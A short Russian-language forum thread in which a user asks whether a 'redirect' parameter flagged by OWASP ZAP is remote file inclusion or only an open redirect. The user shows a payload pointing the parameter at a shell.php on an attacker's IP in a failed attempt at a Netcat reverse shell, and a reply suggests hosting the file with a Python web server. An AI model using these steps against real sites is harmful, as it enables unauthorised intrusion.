![]() |
Нашел уязвимость c помощью owasp zap, выдало как RFI, но не уверен, что это так.
Параметр страницы: currency_code=&redirect=http%3A%2F%2Fwww.google.co m%2F, и редиректит на страницу гугл. Пытался залить шелл: currency_code=&redirect=http://ip/shell.php, файл скачивает, но с помощью Netcat обратную оболочку не дает. С чем это связано, и есть ли тут вообще RFI или только OPEN REDIRECT? |
Цитата:
На удаленном сервере http://ip/ (где shell.php) подними веб сервер: Код:
python3 -m http.server 8000 |
Цитата:
|
| Время: 02:15 |